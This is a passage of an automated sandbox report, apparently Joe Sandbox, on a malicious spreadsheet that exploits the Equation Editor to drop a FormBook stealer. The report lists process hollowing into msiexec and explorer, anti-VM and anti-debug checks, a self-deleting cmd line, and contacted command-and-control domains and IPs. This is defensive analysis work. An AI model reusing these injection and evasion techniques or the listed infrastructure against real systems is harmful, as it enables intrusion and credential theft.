Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FAB8 NtQueryValueKey, 5_2_0075FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FB50 NtCreateKey, 5_2_0075FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FBE8 NtQueryVirtualMemory, 5_2_0075FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00760C40 NtGetContextThread, 5_2_00760C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FC48 NtSetInformationFile, 5_2_0075FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_0075FC30 NtOpenProcess, 5_2_0075FC30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026600C4 NtCreateFile,LdrInitializeThunk, 8_2_026600C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026607AC NtCreateMutant,LdrInitializeThunk, 8_2_026607AC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_0265FAE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_0265FB68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FB50 NtCreateKey,LdrInitializeThunk, 8_2_0265FB50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_0265FBB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265F900 NtReadFile,LdrInitializeThunk, 8_2_0265F900
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265F9F0 NtClose,LdrInitializeThunk, 8_2_0265F9F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_0265FED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FFB4 NtCreateSection,LdrInitializeThunk, 8_2_0265FFB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_0265FC60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_0265FDC0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FD8C NtDelayExecution,LdrInitializeThunk, 8_2_0265FD8C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02660060 NtQuerySection, 8_2_02660060
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02660078 NtResumeThread, 8_2_02660078
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02660048 NtProtectVirtualMemory, 8_2_02660048
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026610D0 NtOpenProcessToken, 8_2_026610D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02661148 NtOpenThread, 8_2_02661148
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266010C NtOpenDirectoryObject, 8_2_0266010C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026601D4 NtSetValueKey, 8_2_026601D4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FA50 NtEnumerateValueKey, 8_2_0265FA50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FA20 NtQueryInformationFile, 8_2_0265FA20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FAD0 NtAllocateVirtualMemory, 8_2_0265FAD0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FAB8 NtQueryValueKey, 8_2_0265FAB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FBE8 NtQueryVirtualMemory, 8_2_0265FBE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265F8CC NtWaitForSingleObject, 8_2_0265F8CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02661930 NtSetContextThread, 8_2_02661930
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265F938 NtWriteFile, 8_2_0265F938
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FE24 NtWriteVirtualMemory, 8_2_0265FE24
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FEA0 NtReadVirtualMemory, 8_2_0265FEA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FF34 NtQueueApcThread, 8_2_0265FF34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FFFC NtCreateProcessEx, 8_2_0265FFFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02660C40 NtGetContextThread, 8_2_02660C40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FC48 NtSetInformationFile, 8_2_0265FC48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FC30 NtOpenProcess, 8_2_0265FC30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FC90 NtUnmapViewOfSection, 8_2_0265FC90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FD5C NtEnumerateKey, 8_2_0265FD5C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02661D80 NtSuspendThread, 8_2_02661D80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E85F0 NtCreateFile, 8_2_000E85F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E86A0 NtReadFile, 8_2_000E86A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E8720 NtClose, 8_2_000E8720
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E85EA NtCreateFile, 8_2_000E85EA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00B96A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 8_2_00B96A82
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00B96F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 8_2_00B96F06
PE file does not import any functions
Source: Cielert.tmp.4.dr Static PE information: No import functions for PE file found
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe 1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Cielert.tmp 8916FF8C659E74F4A3523CDA054E5ED98209F84CB23F28C5857D670D5DC512E2
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Cielert.tmp.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Cielert.tmp.4.dr Static PE information: Section .text
Source: RFQ_Order_PO_TAE5203E.xlsx Virustotal: Detection: 35%
Source: RFQ_Order_PO_TAE5203E.xlsx ReversingLabs: Detection: 34%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$RFQ_Order_PO_TAE5203E.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRB36.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/15@3/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436274 FindResourceA,LoadResource,LockResource, 4_2_00436274
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.560819872.0000000000460000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.560884485.00000000004EA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.560868156.00000000004D9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.560943288.0000000000750000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.526246673.00000000005C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.561680130.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.525339285.00000000002B0000.00000004.00000001.sdmp, msiexec.exe

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_004258C0 push eax; ret 4_2_004258EE
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044F951 push ecx; iretd 4_2_0044F983
Source: C:\Users\Public\vbc.exe Code function: 4_2_00425CA0 push eax; ret 4_2_00425CBE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_004160CB push edx; ret 5_2_004160CD
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8D6 push ebp; ret 5_2_0041B8F1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8F3 push ebp; ret 5_2_0041B8F1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C134 push ebp; ret 5_2_0041B8F1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00407265 push cs; iretd 5_2_0040726E
Source: C:\Users\Public\vbc.exe Code function: 5_2_004152C7 push edx; retf 5_2_004152C8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041537D push ebp; retf 5_2_0041537E
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C5DD push ebp; ret 5_2_0041B8F1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415F76 push ds; iretd 5_2_00415FE3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408783 push ecx; iretd 5_2_00408784
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266DFA1 push ecx; ret 8_2_0266DFB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E60CB push edx; ret 8_2_000E60CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D7265 push cs; iretd 8_2_000D726E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E52C7 push edx; retf 8_2_000E52C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E537D push ebp; retf 8_2_000E537E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D8783 push ecx; iretd 8_2_000D8784
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB7E5 push eax; ret 8_2_000EB838
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB83B push eax; ret 8_2_000EB8A2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB832 push eax; ret 8_2_000EB838
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB89C push eax; ret 8_2_000EB8A2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB8D6 push ebp; ret 8_2_000EB8F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E5F76 push ds; iretd 8_2_000E5FE3
PE file contains sections with non-standard names
Source: hnmy[1].exe.2.dr Static PE information: section name: .bdata
Source: vbc.exe.2.dr Static PE information: section name: .bdata
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436591 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary, 4_2_00436591
Source: initial sample Static PE information: section name: .text entropy: 7.32148562524

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\Cielert.tmp Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Found hidden mapped module (file has been removed from disk)
Source: C:\Users\Public\vbc.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CIELERT.TMP
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042F0F0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC, 4_2_0042F0F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041B3B0 IsIconic, 4_2_0041B3B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042F8A0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA, 4_2_0042F8A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041DCC2 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_0041DCC2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2848 Thread sleep time: -240000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Found large amount of non-executed APIs
Source: C:\Users\Public\vbc.exe API coverage: 4.7 %
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00437A5E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 4_2_00437A5E
Source: explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.549935611.000000000456F000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.546753465.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.550067017.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436591 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary, 4_2_00436591
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_004465D8 mov eax, dword ptr fs:[00000030h] 4_2_004465D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004465E8 mov eax, dword ptr fs:[00000030h] 4_2_004465E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446608 mov eax, dword ptr fs:[00000030h] 4_2_00446608
Source: C:\Users\Public\vbc.exe Code function: 4_2_004466A8 mov eax, dword ptr fs:[00000030h] 4_2_004466A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446978 mov eax, dword ptr fs:[00000030h] 4_2_00446978
Source: C:\Users\Public\vbc.exe Code function: 4_2_00441E58 mov ecx, dword ptr fs:[00000030h] 4_2_00441E58
Source: C:\Users\Public\vbc.exe Code function: 5_2_007726F8 mov eax, dword ptr fs:[00000030h] 5_2_007726F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026726F8 mov eax, dword ptr fs:[00000030h] 8_2_026726F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A3B6 SetUnhandledExceptionFilter, 4_2_0042A3B6
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A3C8 SetUnhandledExceptionFilter, 4_2_0042A3C8

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 163.197.71.43 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mediafyagency.com
Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.aloebiotics.com
Source: C:\Windows\explorer.exe Domain query: www.sjljtzsls.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: CA0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: C:\Users\user\AppData\Local\Temp\Cielert.tmp target: C:\Users\Public\vbc.exe protection: readonly Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A855 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 4_2_0042A855
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043B3F9 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 4_2_0043B3F9

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
